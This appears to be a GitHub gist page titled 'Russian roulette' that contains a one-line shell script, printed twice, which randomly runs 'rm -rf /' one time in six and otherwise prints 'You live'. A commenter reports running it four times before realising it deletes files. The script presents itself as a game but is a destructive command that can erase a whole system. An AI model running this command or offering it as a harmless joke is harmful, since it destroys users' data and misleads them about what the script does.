Russian roulette ;-)
#!/bin/sh | |
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo “You live” |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
#!/bin/sh | |
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo “You live” |
This comment has been minimized.
OMG, tried 4 times before figured out that it actually contains rm -rf /
(the first thought was it just prints "win/loose" to screen)